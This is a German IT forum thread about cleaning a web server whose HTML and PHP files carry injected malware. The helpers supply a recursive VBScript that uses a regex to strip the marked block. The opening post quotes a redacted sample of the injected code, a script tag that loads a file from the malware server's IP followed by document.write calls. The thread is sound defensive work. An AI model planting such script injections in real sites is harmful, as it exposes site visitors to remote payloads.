Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

gelöst Per batch Text in HTML und PHP Dateien suchen und ersetzen

Mitglied: Rene1976

Rene1976 (Level 2) - Jetzt verbinden

29.08.2013 um 15:56 Uhr, 4921 Aufrufe, 7 Kommentare, 4 Danke

Hallo,

ich habe auf unserem Webserver Malware gefunden, die anscheinend viele.html und .php Dateien befallen hat.

Habe die befallenen Dateien alle heruntergeladen und die Teile der Webseite auf "under construction" gesetzt.

Jetzt suche ich ein Programm, dass per batch die Dateien öffnen kann und den gesamten Bereich durch "nichts" ersetzen kann bzw. löschen kann.

Bis jetzt habe ich das Programm Agent Ransack gefunden.
Das konnte mir alle infizierten Dateien finden.
Leider hat das Programm keine suchen und ersetzen Funktion.

Kennt jemand ein visuelles Programm das die Dateien erst auflistet und dann jede Datei nach dem Code durchsuchen kann und vor allem zuverlässig nur dieses Segment löschen kann?

Weiteres Problem dabei:
Der eingeschleuste Code ändern sich auf jeder Seite (es steht immer ein anderer Deep-Link drin, aber immer die gleich IP-Adresse).
Es ist also nicht auf jeder Seite gleich.

Gleich bleibt aber der Anfang und Schluss.

<!123>Inhalt der sich ändert <!123>

Beispiel (verändert - unbrauchbar):

<!--98a55d9688938f1544--><script type='text/javascript' src='http://IP-Adresse-des-Malware-Servers/tmp/jquery.js?Nummer=85&fid=d ...'></script><script type='text/javascript'>if (typeof KDDRTFGEG == weitere Befehle);document.write("weitere Befehle");KDDRTFGEG=true;}</script><!--98a55d9688938f1544-->

Ich brauch also ein Programm das mir zwischen bzw. inklusive Start und Ende alles löscht und vor allem den Rest der Datei unbeschädigt lässt.

Besten Dank für eure Tipps.

Rene
Mitglied: colinardo
29.08.2013 um 16:16 Uhr
Hallo Rene,
und täglich grüßt das Murmeltier
Schau dir mal UltraEdit an.
Ansonsten ließe sich das mit einem einfachen VBA-Script mit Regular Expression Replace durchführen. Beispiele gibts dazu hier im Forum genug.

Grüße Uwe
Bitte warten ..
Mitglied: Snowman25
29.08.2013 um 16:43 Uhr
Hi Rene1976,

Mir fällt spontan Notepad++ ein. Du musst dann zwar alle Dateien öffnen, aber dann kannst du auch in allen Dateien gleichzeitig suchen und ersetzen (oder dir die Ergebnisse anzeigen lassen und zur entsprechenden Datei + Position springen).

Gruß,
Snowman25
Bitte warten ..
29.08.2013, aktualisiert um 17:10 Uhr
Zitat von colinardo:
Ansonsten ließe sich das mit einem einfachen VBA-Script mit Regular Expression Replace durchführen. Beispiele gibts dazu hier im Forum genug.
Ich geb zu, da war ich wieder mal lazy mit dem Suchverweis

hier ein mögliches VBS-Script dazu:
In Zeile 1 noch den Pfad zu deinen HTML-Dateien eintragen, und den passende Regular Expression String in Zeile 5 anpassen. Wenn du dich mit RegEx noch nicht auskennst kann ich dir gerne einen passenden Pattern zusammenbauen. Der jetzige passt auf dein gepostetes Beispiel. Das Script bearbeitet dann alle Dateien mit den folgenden Endungen (*.html / *.htm / *.php).

01.
strFolder = "C:\HTML-Dateien-Ordner"
02.
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
03.

04.
Set regex = New RegExp
05.
regex.Pattern = "<!--98a55d9688938f1544-->.*<!--98a55d9688938f1544-->"
06.
regex.Global = True
07.

08.
For Each f In fso.GetFolder(strFolder).Files
09.
	If LCase(Right(f.Name,4)) = "html" Or LCase(Right(f.Name,3)) = "htm" Or LCase(Right(f.Name,3)) = "php" Then
10.
		Set objFileRead = fso.OpenTextFile(f.Path,1,-1)
11.
		strContent = objFileRead.ReadAll()
12.
		objFileRead.Close
13.
		If regex.Test(strContent) Then
14.
			newContent = regex.Replace(strContent,"")
15.
			Set objFileWrite = fso.OpenTextFile(f.Path,2)
16.
			objFileWrite.Write(newContent)
17.
			objFileWrite.Close
18.
		End If
19.
	End If
20.
Next
21.
MsgBox "Fertig bearbeitet"
Grüße Uwe
Bitte warten ..
30.08.2013 um 12:17 Uhr
Hi Uwe und Snowman25,

danke für eure Antworten.
Ich wollte es zuerst mit Notepad probieren.
Leider musste ich feststellen das unser Newsletter-Archiv auch betroffen ist.

Problem:
Jeder Newsletter wird in einen eigenen Unterordner abgelegt.
Der Name der Newsletterdatei in den jeweiligen Unterordnern ist immer der gleiche.

Frage:
Wie kann man in den oben angegeben Skript alle Ordner mit Unterordner auf einmal durchsuchen und ersetzten?

Sorry, ich kann leider nicht programmieren.

Gruß,

Rene
Bitte warten ..
30.08.2013 um 12:27 Uhr
Zitat von Rene1976:
Frage:
Wie kann man in den oben angegeben Skript alle Ordner mit Unterordner auf einmal durchsuchen und ersetzten?

01.
strFolder = "C:\HTML-Dateien-Ordner"
02.
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
03.
Set regex = New RegExp
04.
regex.Pattern = "<!--98a55d9688938f1544-->.*<!--98a55d9688938f1544-->"
05.
regex.Global = True
06.
parseFolders fso.GetFolder(strFolder), True
07.
MsgBox "Fertig bearbeitet"
08.

09.
Function parseFolders(strFldr,boolRecursion)
10.
	For Each f In strFldr.Files
11.
		If LCase(Right(f.Name,4)) = "html" Or LCase(Right(f.Name,3)) = "htm" Or LCase(Right(f.Name,3)) = "php" Then
12.
			Set objFileRead = fso.OpenTextFile(f.Path,1,-1)
13.
			strContent = objFileRead.ReadAll()
14.
			objFileRead.Close
15.
			If regex.Test(strContent) Then
16.
				newContent = regex.Replace(strContent,"")
17.
				Set objFileWrite = fso.OpenTextFile(f.Path,2)
18.
				objFileWrite.Write(newContent)
19.
				objFileWrite.Close
20.
			End If
21.
		End If
22.
	Next
23.

24.
	If boolRecursion Then
25.
		For Each subFolder in strFldr.SubFolders
26.
			parseFolders subFolder, True
27.
		Next
28.
	End If
29.
End Function
Grüße Uwe
Bitte warten ..
30.08.2013 um 12:54 Uhr
Danke Uwe.

Das ging aber schnell.

Ich werde es heute noch ausprobieren.

Bis dann.

Rene
Bitte warten ..
30.08.2013 um 16:08 Uhr
Hi Uwe,

danke für dein neues Skript.
Im Test hat es wunderbar funktioniert.

Bin gerade dabei alles wieder zu bereinigen.

Bis dann und schönes Wochenende.

Rene
Bitte warten ..
Ähnliche Inhalte
Batch & Shell
Mit Einer Batch Datei Text Bearbeiten
gelöst Frage von ronny30021Batch & Shell2 Kommentare

Guten Tag miteinader Ich habe folgendes Problem: Ich würde gerne mit einer Batch-Datei eine Text-Datei durchsuchen, Das gesuchte wort ...

PHP
HTML PHP MySQL Webanwendung
Frage von hahaxd3PHP12 Kommentare

Hallo Leute, Ich möchte gerne Meine Datenbank auf einer webseite darstellen. Dabei sollte diese Als normale Tabelle dargestellt sein. ...

Windows 7

Text filtern, mit Hilfe einer Batch Datei ?

Frage von meisterluehrsWindows 713 Kommentare

Hallo, ich bräuchte mal die Hilfe von ein paar "Experten" :D, die sich mit den Batch-Dateien, bzw der CMD ...

PHP

HTML Code in PHP

gelöst Frage von newit1PHP8 Kommentare

Hallo, es geht um folgenden PHP Code: In der letzten Zeile wird ein einer Tabelle die E-Mail Adresse ausgegeben. ...

Neue Wissensbeiträge
iOS
IOS hat nen Cursor !!!
Tipp von Criemo vor 10 StundeniOS2 Kommentare

Nette Funktion im iOS. iPhone-Mauszeiger aktivieren „Nichts ist nerviger, als bei einem Tippfehler zu versuchen, den iOS-Cursor an die ...

Off Topic
Avengers 4: Endgame - Erster Trailer
Information von Frank vor 2 TagenOff Topic2 Kommentare

Ich weiß es ist Off Topic, aber ich freue mich auf diesen Film und vielleicht geht es anderen hier ...

Webbrowser
Microsoft bestätigt Edge mit Chromium-Kern
Information von Frank vor 2 TagenWebbrowser5 Kommentare

Microsoft hat nun in seinem Blog bestätigt, dass die nächste Edge Version kein EdgeHTML mehr für die Darstellung benutzen ...

Sicherheit

MikroTik: Sicherheitslücke wird ausgenutzt obwohl ein Update seit langem verfügbar ist

Information von sabines vor 3 TagenSicherheit

Obwohl ein Update, dass die nun massenhaft ausgenutzte Lücke schließt, seit langem (März 2018) verfügbar ist, wird es offensichtlich ...

Heiß diskutierte Inhalte
Exchange Server
Exchange Server 2010: Keine Eingehenden E-MAils
Frage von gabeBUExchange Server15 Kommentare

Hallo Zusammen Ich habe das kurzen auf dem Exchange 2010 Server das Problem, dass ich keine externen E-Mails mehr ...

Rechtliche Fragen
Systemhaus auf Abwegen
Frage von rocco61Rechtliche Fragen14 Kommentare

Hallo zusammen, bin derzeit ratlos bei dem folgenden Scenario: In einen Seniorenheim wurde beschlossen, die IT an eine andere ...

Server
Server in zwei verschiedene Netzwerke einbinden
Frage von BennyFServer10 Kommentare

Hallo zusammen, bei uns im Haus sind im Erdgeschoss die Geschäftsräume und ab dem 1. Stock sind unsere privaten ...

Outlook & Mail
Kalendersync mit Android und Outlook
Frage von Stefan007Outlook & Mail9 Kommentare

Hi Leute, kennt jemand eine Möglichkeit um Termine zwischen installiertem Outlook auf dem PC und dem Kalender auf einem ...